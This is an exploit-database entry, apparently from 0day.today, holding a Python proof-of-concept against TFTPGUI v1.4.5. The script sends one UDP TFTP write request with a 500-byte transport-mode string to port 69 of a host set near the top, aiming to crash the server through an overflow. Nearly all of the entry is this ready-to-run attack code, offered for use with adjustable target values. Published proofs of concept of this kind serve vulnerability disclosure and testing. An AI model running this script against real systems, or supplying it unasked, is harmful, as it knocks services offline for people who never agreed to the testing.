TFTPGUI v1.4.5 Long Transport Mode Overflow

2010-05-02T00:00:00
ID 1337DAY-ID-12110
Type zdt
Reporter Jeremiah Talamantes
Modified 2010-05-02T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            ===========================================
TFTPGUI v1.4.5 Long Transport Mode Overflow
===========================================

#!/usr/bin/python
print "\n#################################################################"
print "##                      RedTeam Security                       ##"
print "##             TFTPGUI Long Transport Mode Overflow            ##"
print "##                        Version 1.4.5                        ##"
print "##                      LIST Vulnerability                     ##"
print "##                                                             ##"
print "##                     Jeremiah Talamantes                     ##"
print "##                   [email protected]                    ##"
print "################################################################# \n"
 
import socket
import sys
 
# Change these values to suit your needs
host = '192.168.1.108'
port = 69
  
try:
   s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
   print "Error: unable to connect."
   sys.exit(1)
  
# Creating the overly long transport mode string
fn = "A"
md = "A" * 500
stuff = "\x00\x02" + fn + "\0" + md + "\0"
 
# Send data
s.sendto(stuff, (host, port))
print "Check to see if TFTPGUI is still running..."
 
# End



#  0day.today [2018-02-06]  #